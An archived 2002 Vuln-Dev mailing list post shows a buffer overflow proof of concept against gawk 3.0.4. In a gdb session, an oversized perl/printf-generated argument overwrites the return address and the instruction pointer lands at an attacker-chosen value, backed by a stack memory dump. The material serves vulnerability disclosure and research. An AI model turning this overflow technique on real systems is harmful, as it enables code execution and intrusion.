 VULN-DEV ARCHIVE  


To: Vuln-Dev
Subject: RE: Buffer overflow in awk
Date: Mar 15 2002 9:20PM
Author: dong-h0un U <xploit hackermail com>
Message-ID: <20020315212018.28661.qmail@hackermail.com>
 This puts last 'NULL byte' and change rule of program.
 Pico editor or snmpd did exploit by similar method.

 [x82@xpl017elz x82]$ gdb -q awk
 (no debugging symbols found)...(gdb) r -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"`
 Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"`
 
 Program received signal SIGSEGV, Segmentation fault.
 0x8282bab0 in ?? ()
 (gdb) q
 The program is running.  Exit anyway? (y or n) y   
 [x82@xpl017elz x82]$ rpm -qa | grep awk
 gawk-3.0.4-1
 [x82@xpl017elz x82]$

 debugging: 

 (gdb)
 ...
 0xbfffd2b0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2c0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2d0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2e0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd2f0:     0x82828282      0x82828282      0x82828282      0x82828282
 0xbfffd300:     0x82828282      0x8282bab0      0xbfffd300      0x080538cc
                                                         ~~ <- it's
 0xbfffd310:     0xbfffdd46      0xbfffd390      0x080577e6      0xbfffdd46
 0xbfffd320:     0xfffffffa      0x00000000      0x00000000      0x00000000
 (gdb) x 0xbfffd304
 0xbfffd304:     0x8282bab0
 (gdb)

 fun! 
 Sorry, I do not English. :-X

 --
 by "you dong-hun"(Xpl017Elz), <szoahc hotmail com>  

